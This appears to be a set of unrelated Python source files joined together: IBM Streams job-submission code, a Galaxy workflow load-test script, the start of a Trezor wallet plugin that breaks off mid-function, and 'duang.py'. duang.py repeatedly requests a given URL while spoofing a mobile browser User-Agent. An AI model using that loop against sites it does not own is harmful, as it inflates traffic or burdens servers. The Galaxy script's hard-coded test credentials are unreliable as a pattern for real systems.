# Pypi (pip install) package includes the SPL toolkit as
# streamsx/.toolkit/com.ibm.streamsx.topology
# However the streamsx Python packages have been moved out
# of the toolkit's (opt/python/package) compared
# to the original toolkit layout. They are moved to the
# top level of the pypi package.
#
# SPL Toolkit (SPL focused):
# Streamsx Python packages are executed from opt/python/packages
#
# This function determines the root of the SPL toolkit based
# upon the existance of the '.toolkit' directory.
#
@staticmethod
def _get_toolkit_root():
# Directory of this file (streamsx/topology)
dir = os.path.dirname(os.path.abspath(__file__))
# This is streamsx
dir = os.path.dirname(dir)
# See if .toolkit exists, if so executing from
# a pip install
tk_root = os.path.join(dir, '.toolkit', 'com.ibm.streamsx.topology')
if os.path.isdir(tk_root):
return tk_root
# Else dir is tk/opt/python/packages/streamsx
dir = os.path.dirname(dir)
dir = os.path.dirname(dir)
dir = os.path.dirname(dir)
tk_root = os.path.dirname(dir)
return tk_root
class _StreamingAnalyticsSubmitter(_BaseSubmitter):
"""
A submitter supports the ANALYTICS_SERVICE (Streaming Analytics service) context.
"""
def __init__(self, ctxtype, config, graph):
super(_StreamingAnalyticsSubmitter, self).__init__(ctxtype, config, graph)
self._streams_connection = self._config().get(ConfigParams.STREAMS_CONNECTION)
self._vcap_services = self._config().get(ConfigParams.VCAP_SERVICES)
self._service_name = self._config().get(ConfigParams.SERVICE_NAME)
if self._streams_connection is not None:
if not isinstance(self._streams_connection, rest.StreamingAnalyticsConnection):
raise ValueError("config must contain a StreamingAnalyticsConnection object when submitting to "
"{} context".format(ctxtype))
# Use credentials stored within StreamingAnalyticsConnection
self._service_name = self._streams_connection.service_name
self._vcap_services = {'streaming-analytics': [
{'name': self._service_name, 'credentials': self._streams_connection.credentials}
]}
self._config()[ConfigParams.SERVICE_NAME] = self._service_name
# TODO: Compare credentials between the config and StreamsConnection, verify they are the same
# Clear the VCAP_SERVICES key in config, since env var will contain the content
self._config().pop(ConfigParams.VCAP_SERVICES, None)
self._setup_views()
def streams_connection(self):
if self._streams_connection is None:
self._streams_connection = rest.StreamingAnalyticsConnection(self._vcap_services, self._service_name)
return self._streams_connection
def _augment_submission_result(self, submission_result):
vcap = rest._get_vcap_services(self._vcap_services)
credentials = rest._get_credentials(vcap, self._service_name)
instance_id = credentials['jobs_path'].split('/service_instances/', 1)[1].split('/', 1)[0]
submission_result['instanceId'] = instance_id
submission_result['streamsConnection'] = self.streams_connection()
def _get_java_env(self):
"Pass the VCAP through the environment to the java submission"
env = super(_StreamingAnalyticsSubmitter, self)._get_java_env()
vcap = rest._get_vcap_services(self._vcap_services)
env['VCAP_SERVICES'] = json.dumps(vcap)
return env
class _DistributedSubmitter(_BaseSubmitter):
"""
A submitter which supports the DISTRIBUTED (on-prem cluster) context.
"""
def __init__(self, ctxtype, config, graph, username, password):
_BaseSubmitter.__init__(self, ctxtype, config, graph)
self._streams_connection = config.get(ConfigParams.STREAMS_CONNECTION)
self.username = username
self.password = password
# Verify if credential (if supplied) is consistent with those in StreamsConnection
if self._streams_connection is not None:
self.username = self._streams_connection.rest_client._username
self.password = self._streams_connection.rest_client._password
if ((username is not None and username != self.username or
password is not None and password != self.password)):
raise RuntimeError('Credentials supplied in the arguments differ than '
'those specified in the StreamsConnection object')
# Give each view in the app the necessary information to connect to SWS.
self._setup_views()
def streams_connection(self):
if self._streams_connection is None:
self._streams_connection = rest.StreamsConnection(self.username, self.password)
return self._streams_connection
def _augment_submission_result(self, submission_result):
submission_result['instanceId'] = os.environ.get('STREAMS_INSTANCE_ID', 'StreamsInstance')
# If we have the information to create a StreamsConnection, do it
if not ((self.username is None or self.password is None) and
self.config.get(ConfigParams.STREAMS_CONNECTION) is None):
submission_result['streamsConnection'] = self.streams_connection()
class _SubmitContextFactory(object):
"""
ContextSubmitter:
Responsible for performing the correct submission depending on a number of factors, including: the
presence/absence of a streams install, the type of context, and whether the user seeks to retrieve data via rest
"""
def __init__(self, graph, config=None, username=None, password=None):
self.graph = graph
self.config = config
self.username = username
self.password = password
if self.config is None:
self.config = {}
def get_submit_context(self, ctxtype):
# If there is no streams install present, currently only ANALYTICS_SERVICE, TOOLKIT, and BUILD_ARCHIVE
# are supported.
streams_install = os.environ.get('STREAMS_INSTALL')
if streams_install is None:
if not (ctxtype == ContextTypes.TOOLKIT or ctxtype == ContextTypes.BUILD_ARCHIVE
or ctxtype == ContextTypes.ANALYTICS_SERVICE or ctxtype == ContextTypes.STREAMING_ANALYTICS_SERVICE):
raise ValueError(ctxtype + " must be submitted when an IBM Streams install is present.")
if ctxtype == ContextTypes.DISTRIBUTED:
logger.debug("Selecting the DISTRIBUTED context for submission")
return _DistributedSubmitter(ctxtype, self.config, self.graph, self.username, self.password)
elif ctxtype == ContextTypes.ANALYTICS_SERVICE or ctxtype == ContextTypes.STREAMING_ANALYTICS_SERVICE:
logger.debug("Selecting the STREAMING_ANALYTICS_SERVICE context for submission")
if not (sys.version_info.major == 3 and sys.version_info.minor == 5):
raise RuntimeError("The ANALYTICS_SERVICE context only supports Python version 3.5")
ctxtype = ContextTypes.STREAMING_ANALYTICS_SERVICE
return _StreamingAnalyticsSubmitter(ctxtype, self.config, self.graph)
else:
logger.debug("Using the BaseSubmitter, and passing the context type through to java.")
return _BaseSubmitter(ctxtype, self.config, self.graph)
# Used to delete the JSON file after it is no longer needed.
def _delete_json(submitter):
for fn in [submitter.fn, submitter.results_file]:
if os.path.isfile(fn):
os.remove(fn)
# Used by a thread which polls a subprocess's stdout and writes it to stdout
def _print_process_stdout(process):
try:
while True:
if sys.version_info.major == 2:
sout = codecs.getwriter('utf8')(sys.stdout)
line = process.stdout.readline()
if len(line) == 0:
process.stdout.close()
break
line = line.decode("utf-8").strip()
if sys.version_info.major == 2:
sout.write(line)
sout.write("\n")
else:
print(line)
except:
logger.error("Error reading from Java subprocess stdout stream.")
raise
finally:
process.stdout.close()
# Used by a thread which polls a subprocess's stderr and writes it to stderr, until the sc compilation
# has begun.
def _print_process_stderr(process, submitter):
try:
if sys.version_info.major == 2:
serr = codecs.getwriter('utf8')(sys.stderr)
while True:
line = process.stderr.readline()
if len(line) == 0:
process.stderr.close()
break
line = line.decode("utf-8").strip()
if sys.version_info.major == 2:
serr.write(line)
serr.write("\n")
else:
print(line)
except:
logger.error("Error reading from Java subprocess stderr stream.")
raise
finally:
process.stderr.close()
class ContextTypes(object):
"""
Submission context types.
A :py:class:`~streamsx.topology.topology.Topology` is submitted using :py:func:`submit` and a context type.
Submision of a `Topology` generally builds the application into a Streams application
bundle (sab) file and then submits it for execution in the required context.
The Streams application bundle contains all the artifacts required by an application such
that it can be executed remotely (e.g. on a Streaming Analytics service), including
distributing the execution of the application across multiple resources (hosts).
The context type defines which context is used for submission.
The main context types result in a running application and are:
* :py:const:`STREAMING_ANALYTICS_SERVICE` - Application is submitted to a Streaming Analytics service running on IBM Bluemix cloud platform.
* :py:const:`DISTRIBUTED` - Application is submitted to an IBM Streams instance.
* :py:const:`STANDALONE` - Application is executed as a local process, IBM Streams `standalone` application. Typically this is used during development or testing.
The :py:const:`BUNDLE` context type compiles the application (`Topology`) to produce a
Streams application bundle (sab file). The bundle is not executed but may subsequently be submitted
to a Streaming Analytics service or an IBM Streams instance. A bundle may be submitted multiple
times to services or instances, each resulting in a unique job (running application).
"""
STREAMING_ANALYTICS_SERVICE = 'STREAMING_ANALYTICS_SERVICE'
"""Submission to Streaming Analytics service running on IBM Bluemix cloud platform.
The `Topology` is compiled and the resultant Streams application bundle
(sab file) is submitted for execution on the Streaming Analytics service.
When **STREAMS_INSTALL** is not set or the :py:func:`submit` `config` parameter has
:py:const:`~ConfigParams.FORCE_REMOTE_BUILD` set to `True` the compilation of the application
occurs remotely by the service. This allows creation and submission of Streams applications
without a local install of IBM Streams.
When **STREAMS_INSTALL** is set and the :py:func:`submit` `config` parameter has
:py:const:`~ConfigParams.FORCE_REMOTE_BUILD` set to `False` or not set then the creation of the
Streams application bundle occurs locally and the bundle is submitted for execution on the service.
Environment variables:
These environment variables define how the application is built and submitted.
* **STREAMS_INSTALL** - (optional) Location of a IBM Streams installation (4.0.1 or later). The install must be running on RedHat/CentOS 6 and `x86_64` architecture.
"""
ANALYTICS_SERVICE = 'ANALYTICS_SERVICE'
"""Synonym for :py:const:`STREAMING_ANALYTICS_SERVICE`.
"""
DISTRIBUTED = 'DISTRIBUTED'
"""Submission to an IBM Streams instance.
The `Topology` is compiled locally and the resultant Streams application bundle
(sab file) is submitted to an IBM Streams instance.
Environment variables:
These environment variables define how the application is built and submitted.
* **STREAMS_INSTALL** - Location of a IBM Streams installation (4.0.1 or later).
* **STREAMS_DOMAIN_ID** - Domain identifier for the Streams instance.
* **STREAMS_INSTANCE_ID** - Instance identifier.
* **STREAMS_ZKCONNECT** - (optional) ZooKeeper connection string for domain (when not using an embedded ZooKeeper)
"""
STANDALONE = 'STANDALONE'
"""Build and execute locally.
Compiles and executes the `Topology` locally in IBM Streams standalone mode as a separate sub-process.
Typically used for devlopment and testing.
The call to :py:func:`submit` return when (if) the application completes. An application
completes when it has finite source streams and all tuples from those streams have been
processed by the complete topology. If the source streams are infinite (e.g. reading tweets)
then the standalone application will not complete.
Environment variables:
This environment variables define how the application is built.
* **STREAMS_INSTALL** - Location of a IBM Streams installation (4.0.1 or later).
"""
BUNDLE = 'BUNDLE'
"""Create a Streams application bundle.
The `Topology` is compiled locally to produce Streams application bundle (sab file).
The resultant application can be submitted to:
* Streaming Analytics service using the Streams console or the Streaming Analytics REST api.
* IBM Streams instance using the Streams console, JMX api or command line ``streamtool submitjob``.
* Executed standalone for development or testing (when built with IBM Streams 4.2 or later).
The bundle must be built on the same operating system version and architecture as the intended running
environment. For Streaming Analytics service this is currently RedHat/CentOS 6 and `x86_64` architecture.
Environment variables:
This environment variables define how the application is built.
* **STREAMS_INSTALL** - Location of a IBM Streams installation (4.0.1 or later).
"""
TOOLKIT = 'TOOLKIT'
"""Creates an SPL toolkit.
`Topology` applications are translated to SPL applications before compilation into an Streams application
bundle. This context type produces the intermediate SPL toolkit that is input to the SPL compiler for
bundle creation.
.. note::
`TOOLKIT` is typically only used when diagnosing issues with bundle generation.
"""
BUILD_ARCHIVE = 'BUILD_ARCHIVE'
"""Creates a build archive.
This context type produces the intermediate code archive used for bundle creation.
.. note::
`BUILD_ARCHIVE` is typically only used when diagnosing issues with bundle generation.
"""
STANDALONE_BUNDLE = 'STANDALONE_BUNDLE'
"""Create a Streams application bundle for standalone execution.
The `Topology` is compiled locally to produce Streams standalone application bundle (sab file).
The resultant application can be submitted to:
* Executed standalone for development or testing.
The bundle must be built on the same operating system version and architecture as the intended running
environment. For Streaming Analytics service this is currently RedHat/CentOS 6 and `x86_64` architecture.
Environment variables:
This environment variables define how the application is built.
* **STREAMS_INSTALL** - Location of a IBM Streams installation (4.0.1 or 4.1.x).
.. deprecated:: IBM Streams 4.2
Use :py:const:`BUNDLE` when compiling with IBM Streams 4.2 or later.
"""
class ConfigParams(object):
"""
Configuration options which may be used as keys in :py:func:`submit` `config` parameter.
"""
VCAP_SERVICES = 'topology.service.vcap'
"""Streaming Analytics service credentials in **VCAP_SERVICES** format.
Provides the connection credentials when connecting to a Streaming Analytics service
using context type :py:const:`~ContextTypes.STREAMING_ANALYTICS_SERVICE`.
The key overrides the environment variable **VCAP_SERVICES**.
The value can be:
* Path to a local file containing a JSON representation of the VCAP services information.
* Dictionary containing the VCAP services information.
"""
SERVICE_NAME = 'topology.service.name'
"""Streaming Analytics service name.
Selects the specific Streaming Analytics service from VCAP services information
defined by the the environment variable **VCAP_SERVICES** or the key :py:const:`VCAP_SERVICES` in the `submit` config.
"""
FORCE_REMOTE_BUILD = 'topology.forceRemoteBuild'
"""Force a remote build of the application.
When submitting to :py:const:`STREAMING_ANALYTICS_SERVICE` a local build of the Streams application bundle
will occur if the environment variable **STREAMS_INSTALL** is set. Setting this flag to `True` ignores the
local Streams install and forces the build to occur remotely using the service.
"""
JOB_CONFIG = 'topology.jobConfigOverlays'
"""
Key for a :py:class:`JobConfig` object representing a job configuration for a submission.
"""
STREAMS_CONNECTION = 'topology.streamsConnection'
"""
Key for a :py:class:`StreamsConnection` object for connecting to a running IBM Streams instance.
"""
class JobConfig(object):
"""
Job configuration.
`JobConfig` allows configuration of job that will result from
submission of a py:class:`Topology` (application).
A `JobConfig` is set in the `config` dictionary passed to :py:func:`~streamsx.topology.context.submit`
using the key :py:const:`~ConfigParams.JOB_CONFIG`. :py:meth:`~JobConfig.add` exists as a convenience
method to add it to a submission configuration.
Args:
job_name(str): The name that is assigned to the job. A job name must be unique within a Streasm instance
When set to `None` a system generated name is used.
job_group(str): The job group to use to control permissions for the submitted job.
preload(bool): Specifies whether to preload the job onto all resources in the instance, even if the job is
not currently needed on each. Preloading the job can improve PE restart performance if the PEs are
relocated to a new resource.
data_directory(str): Specifies the location of the optional data directory. The data directory is a path
within the cluster that is running the Streams instance.
tracing: Specify the application trace level. See :py:attr:`tracing`
Example::
# Submit a job with the name NewsIngester
cfg = {}
job_config = JobConfig(job_name='NewsIngester')
job_config.add(cfg)
context.submit('ANALYTICS_SERVICE', topo, cfg)
"""
def __init__(self, job_name=None, job_group=None, preload=False, data_directory=None, tracing=None):
self.job_name = job_name
self.job_group = job_group
self.preload = preload
self.data_directory = data_directory
self.tracing = tracing
self._pe_count = None
@property
def tracing(self):
"""
Runtime application trace level.
The runtime application trace level can be a string with value ``error``, ``warn``, ``info``,
``debug`` or ``trace``.
In addition a level from Python ``logging`` module can be used in with ``CRITICAL`` and ``ERROR`` mapping
to ``error``, ``WARNING`` to ``warn``, ``INFO`` to ``info`` and ``DEBUG`` to ``debug``.
Setting tracing to `None` or ``logging.NOTSET`` will result in the job submission using the Streams instance
application trace level.
The value of ``tracing`` is the level as a string (``error``, ``warn``, ``info``, ``debug`` or ``trace``)
or None.
"""
return self._tracing
@tracing.setter
def tracing(self, level):
if level is None:
pass
elif level in {'error', 'warn', 'info', 'debug', 'trace'}:
pass
elif level == logging.CRITICAL or level == logging.ERROR:
level = 'error'
elif level == logging.WARNING:
level = 'warn'
elif level == logging.INFO:
level = 'info'
elif level == logging.DEBUG:
level = 'debug'
elif level == logging.NOTSET:
level = None
else:
raise ValueError("Tracing value {0} not supported.".format(level))
self._tracing = level
@property
def target_pe_count(self):
"""Target processing element count.
When submitted against a Streams instance `target_pe_count` provides
a hint to the scheduler as to how to partition the topology
across processing elements (processes) for the job execution. When a job
contains multiple processing elements (PEs) then the Streams scheduler can
distributed the PEs across the resources (hosts) running in the instance.
When set to ``None`` (the default) no hint is supplied to the scheduler.
The number of PEs in the submitted job will be determined by the scheduler.
The value is only a target and may be ignored when the topology contains
:py:meth:`~Stream.isolate` calls.
.. note::
Only supported in Streaming Analytics service and IBM Streams 4.2 or later.
"""
if self._pe_count is None:
return None
return int(self._pe_count)
@target_pe_count.setter
def target_pe_count(self, count):
if count is not None:
count = int(count)
if count < 1:
raise ValueError("target_pe_count must be greater than 0.")
self._pe_count = count
def add(self, config):
"""
Add this `JobConfig` into a submission configuration object.
Args:
config(dict): Submission configuration.
Returns:
dict: config.
"""
config[ConfigParams.JOB_CONFIG] = self
return config
def _add_overlays(self, config):
"""
Add this as a jobConfigOverlays JSON to config.
"""
jco = {}
config["jobConfigOverlays"] = [jco]
jc = {}
if self.job_name is not None:
jc["jobName"] = self.job_name
if self.job_group is not None:
jc["jobGroup"] = self.job_group
if self.data_directory is not None:
jc["dataDirectory"] = self.data_directory
if self.preload:
jc['preloadApplicationBundles'] = True
if self.tracing is not None:
jc['tracing'] = self.tracing
if jc:
jco["jobConfig"] = jc
if self.target_pe_count is not None and self.target_pe_count >= 1:
deployment = {'fusionScheme' : 'manual', 'fusionTargetPeCount' : self.target_pe_count}
jco["deploymentConfig"] = deployment
class SubmissionResult(object):
"""Passed back to the user after a call to submit.
Allows the user to use dot notation to access dictionary elements."""
def __init__(self, results):
self.results = results
@property
def job(self):
"""If able, returns the job associated with the submitted build.
If a username/password, StreamsConnection, or vcap file was not supplied,
returns None.
*NOTE*: The @property tag supersedes __getattr__. In other words, this job method is
called before __getattr__(self, 'job') is called.
"""
if 'streamsConnection' in self.results:
sc = self.streamsConnection
inst = sc.get_instance(self.instanceId)
return inst.get_job(self.jobId)
return None
def __getattr__(self, key):
if key in self.__getattribute__("results"):
return self.results[key]
return self.__getattribute__(key)
def __setattr__(self, key, value):
if "results" in self.__dict__:
results = self.results
results[key] = value
else:
super(SubmissionResult, self).__setattr__(key, value)
def __getitem__(self, item):
return self.__getattr__(item)
def __setitem__(self, key, value):
return self.__setattr__(key, value)
def __delitem__(self, key):
if key in self.__getattribute__("results"):
del self.results[key]
return
self.__delattr__(key)
def __contains__(self, item):
return item in self.results
|
workflows_scaling.py
|
#!/usr/bin/env python
"""A small script to drive workflow performance testing.
% ./test/manual/launch_and_run.sh workflows_scaling --collection_size 500 --workflow_depth 4
$ .venv/bin/python scripts/summarize_timings.py --file /tmp/<work_dir>/handler1.log --pattern 'Workflow step'
$ .venv/bin/python scripts/summarize_timings.py --file /tmp/<work_dir>/handler1.log --pattern 'Created step'
"""
import functools
import json
import os
import random
import sys
from argparse import ArgumentParser
from threading import Thread
from uuid import uuid4
from bioblend import galaxy
from gxformat2 import python_to_workflow
galaxy_root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir))
sys.path[1:1] = [os.path.join(galaxy_root, "lib"), os.path.join(galaxy_root, "test")]
from galaxy_test.base.populators import (
GiDatasetCollectionPopulator,
GiDatasetPopulator,
GiWorkflowPopulator,
)
LONG_TIMEOUT = 1000000000
DESCRIPTION = "Script to exercise the workflow engine."
def main(argv=None):
"""Entry point for workflow driving."""
arg_parser = ArgumentParser(description=DESCRIPTION)
arg_parser.add_argument("--api_key", default="testmasterapikey")
arg_parser.add_argument("--host", default="http://localhost:8080/")
arg_parser.add_argument("--collection_size", type=int, default=20)
arg_parser.add_argument("--schedule_only_test", default=False, action="store_true")
arg_parser.add_argument("--workflow_depth", type=int, default=10)
arg_parser.add_argument("--workflow_count", type=int, default=1)
group = arg_parser.add_mutually_exclusive_group()
group.add_argument("--two_outputs", default=False, action="store_true")
group.add_argument("--wave_simple", default=False, action="store_true")
args = arg_parser.parse_args(argv)
uuid = str(uuid4())
workflow_struct = _workflow_struct(args, uuid)
has_input = any([s.get("type", "tool") == "input_collection" for s in workflow_struct])
if not has_input:
uuid = None
gi = _gi(args)
workflow = python_to_workflow(workflow_struct)
workflow_info = gi.workflows.import_workflow_json(workflow)
workflow_id = workflow_info["id"]
target = functools.partial(_run, args, gi, workflow_id, uuid)
threads = []
for _ in range(args.workflow_count):
t = Thread(target=target)
t.daemon = True
t.start()
threads.append(t)
for t in threads:
t.join()
def _run(args, gi, workflow_id, uuid):
dataset_populator = GiDatasetPopulator(gi)
dataset_collection_populator = GiDatasetCollectionPopulator(gi)
history_id = dataset_populator.new_history()
if uuid is not None:
contents = []
for i in range(args.collection_size):
contents.append("random dataset number #%d" % i)
hdca = dataset_collection_populator.create_list_in_history(history_id, contents=contents).json()
label_map = {
uuid: {"src": "hdca", "id": hdca["id"]},
}
else:
label_map = {}
workflow_request = dict(
history="hist_id=%s" % history_id,
)
workflow_request["inputs"] = json.dumps(label_map)
url = "workflows/%s/usage" % (workflow_id)
invoke_response = dataset_populator._post(url, data=workflow_request).json()
invocation_id = invoke_response["id"]
workflow_populator = GiWorkflowPopulator(gi)
if args.schedule_only_test:
workflow_populator.wait_for_invocation(
workflow_id,
invocation_id,
timeout=LONG_TIMEOUT,
)
else:
workflow_populator.wait_for_workflow(
workflow_id,
invocation_id,
history_id,
timeout=LONG_TIMEOUT,
)
def _workflow_struct(args, input_uuid):
if args.two_outputs:
return _workflow_struct_two_outputs(args, input_uuid)
elif args.wave_simple:
return _workflow_struct_wave(args, input_uuid)
else:
return _workflow_struct_simple(args, input_uuid)
def _workflow_struct_simple(args, input_uuid):
workflow_struct = [
{"tool_id": "create_input_collection", "state": {"collection_size": args.collection_size}},
{"tool_id": "cat", "state": {"input1": _link(0, "output")}}
]
workflow_depth = args.workflow_depth
for i in range(workflow_depth):
link = str(i + 1) + "#out_file1"
workflow_struct.append(
{"tool_id": "cat", "state": {"input1": _link(link)}}
)
return workflow_struct
def _workflow_struct_two_outputs(args, input_uuid):
workflow_struct = [
{"type": "input_collection", "uuid": input_uuid},
{"tool_id": "cat", "state": {"input1": _link(0), "input2": _link(0)}}
]
workflow_depth = args.workflow_depth
for i in range(workflow_depth):
link1 = str(i + 1) + "#out_file1"
link2 = str(i + 1) + "#out_file2"
workflow_struct.append(
{"tool_id": "cat", "state": {"input1": _link(link1), "input2": _link(link2)}}
)
return workflow_struct
def _workflow_struct_wave(args, input_uuid):
workflow_struct = [
{"tool_id": "create_input_collection", "state": {"collection_size": args.collection_size}},
{"tool_id": "cat_list", "state": {"input1": _link(0, "output")}}
]
workflow_depth = args.workflow_depth
for i in range(workflow_depth):
step = i + 2
if step % 2 == 1:
workflow_struct += [{"tool_id": "cat_list", "state": {"input1": _link(step - 1, "output")}}]
else:
workflow_struct += [{"tool_id": "split", "state": {"input1": _link(step - 1, "out_file1")}}]
return workflow_struct
def _link(link, output_name=None):
if output_name is not None:
link = str(link) + "#" + output_name
return {"$link": link}
def _gi(args):
gi = galaxy.GalaxyInstance(args.host, key=args.api_key)
name = "wftest-user-%d" % random.randint(0, 1000000)
user = gi.users.create_local_user(name, "%s@galaxytesting.dev" % name, "pass123")
user_id = user["id"]
api_key = gi.users.create_user_apikey(user_id)
user_gi = galaxy.GalaxyInstance(args.host, api_key)
return user_gi
if __name__ == "__main__":
main()
|
duang.py
|
# -*- coding: utf-8 -*-
# duang duang 的持续访问某个 url
import getopt
import threading
import time
import tkinter.messagebox as messagebox
import urllib
import logging
from tkinter import *
from urllib import request
from urllib.request import HTTPRedirectHandler
class OpenerHTTPRedirectHandler(HTTPRedirectHandler):
def http_error_301(self, req, fp, code, msg, headers):
print(headers.headers)
return HTTPRedirectHandler.http_error_301(self, req, fp, code, msg, headers)
def http_error_302(self, req, fp, code, msg, headers):
print(headers.headers)
return HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
def refresh(options):
req = request.Request(options.url)
urllib.request.build_opener(OpenerHTTPRedirectHandler)
req.add_header("User-Agent", "Mozilla/5.0 (Linux; Android 5.1.1; Nexus 6 Build/LYZ28E) AppleWebKit/537.36 (KHTML, "
"like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36")
with request.urlopen(req) as f:
status = f.status
if options.sleep:
time.sleep(options.sleep)
return status
class Options(object):
url = None
count = None
sleep = None
def __str__(self):
return "<%s url=%s, count=%s, sleep=%s>" % \
(self.__class__.__name__, self.url, self.count, self.sleep)
def parse_options(argv):
print(argv)
opts, args = getopt.getopt(argv, "u:c:s:", ["url=", "count=", "sleep="])
if len(opts) == 0:
print("请输入参数,例如 --url=google.com --count=100 --sleep=2")
raise AttributeError()
options = Options()
for k, v in opts:
if k == "--url":
options.url = v
elif k == "--count":
options.count = v
elif k == "--sleep":
options.sleep = v
print(options.__str__())
if not options.url:
print("请输入一个地址,例如: --url=www.google.com")
raise AttributeError()
return options
class Application(Frame):
def __init__(self, master=None):
Frame.__init__(self, master)
self.pack()
self.fm_top = Frame(self)
# label_url
self.label_url = Label(self.fm_top, text="地址:", padx=5)
self.label_url.pack(side=LEFT)
# input_url
self.input_url = Entry(self.fm_top)
self.input_url.pack(side=LEFT, expand=True, fill=X, padx=5, pady=5)
self.fm_top.pack(fill=X, pady=5)
self.fm_center = Frame(self)
# label_count
self.label_count = Label(self.fm_center, text="次数:", padx=5)
self.label_count.pack(side=LEFT)
# input_count
self.input_count = Entry(self.fm_center, width=5)
self.input_count.insert(0, "100")
self.input_count.pack(side=LEFT, expand=True, fill=X, padx=5, pady=5)
# label_sleep
self.label_sleep = Label(self.fm_center, text="间隔时间:", padx=5)
self.label_sleep.pack(side=LEFT)
# input_sleep
self.input_sleep = Entry(self.fm_center, width=5)
self.input_sleep.insert(0, "0")
self.input_sleep.pack(side=LEFT, expand=True, fill=X, padx=5, pady=5)
# btn_action
self.btn_action = Button(self.fm_center, text='开始', command=self.action)
self.btn_action.pack(side=RIGHT, padx=10)
self.fm_center.pack(fill=X)
self.label_text_var = StringVar()
self.fm_bottom = Frame(self)
self.label = Label(self.fm_bottom, textvariable=self.label_text_var, width=50, height=15)
self.label.pack()
self.fm_bottom.pack(fill=X)
def action(self):
url = self.input_url.get()
count = self.input_count.get()
sleep = self.input_sleep.get()
if re.match(r"^\+?[1-9][0-9]*$", count):
count = int(count)
else:
messagebox.showinfo("提示", "次数只能是数字,不能是0")
return
if not re.match(r"^\+?[0-9]*$", sleep):
messagebox.showinfo("提示", "间隔时间只能是数字")
return
if not url:
messagebox.showinfo("提示", "请输入地址")
else:
options = Options()
options.url = url
options.count = count
options.sleep = int(sleep)
t = threading.Thread(target=main, args=(options, self.label_text_var))
t.setDaemon(True)
t.start()
def main(options, label_text=None):
i = 0
if options.count:
count = options.count
else:
count = 100
while i < count:
status = refresh(options)
i += 1
text = "已访问%s次 - status:%s" % (i, status)
if not label_text:
print(text)
else:
label_text.set(text)
text_end = "结束访问,总共%s次" % count
if not label_text:
print(text_end)
else:
label_text.set(text_end)
def center(win):
"""
centers a tkinter window
:param win: the root or Toplevel window to center
"""
win.update_idletasks()
width = win.winfo_width()
fm_width = win.winfo_rootx() - win.winfo_x()
win_width = width + 2 * fm_width
height = win.winfo_height()
title_bar_height = win.winfo_rooty() - win.winfo_y()
win_height = height + title_bar_height + fm_width
x = win.winfo_screenwidth() // 2 - win_width // 2
y = win.winfo_screenheight() // 2 - win_height // 2
win.geometry('{}x{}+{}+{}'.format(width, height, x, y))
win.deiconify()
if __name__ == "__main__":
try:
if len(sys.argv[1:]) == 0:
root = Tk()
root.title("duang")
Application(root)
center(root)
root.mainloop()
else:
main(parse_options(sys.argv[1:]))
except Exception as e:
logging.error(e.args)
sys.exit(1)
|
trezor.py
|
import traceback
import sys
from typing import NamedTuple, Any
from electrum_trc.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum_trc.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum_trc.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum_trc import constants
from electrum_trc.i18n import _
from electrum_trc.plugin import Device
from electrum_trc.transaction import deserialize, Transaction
from electrum_trc.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_trc.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum_trc.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from trezorlib.transport.bridge import BridgeTransport, call_bridge
from .clientbase import TrezorClientBase
from trezorlib.messages import (
RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
RECOVERY_TYPE_SCRAMBLED_WORDS = RecoveryDeviceType.ScrambledWords
RECOVERY_TYPE_MATRIX = RecoveryDeviceType.Matrix
TREZORLIB = True
except Exception as e:
_logger.exception('error importing trezorlib')
TREZORLIB = False
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(2)
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None:
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
no_backup: bool = False
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 11, 0)
maximum_library = (0, 12)
SUPPORTED_XTYPES = ('standard', )
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
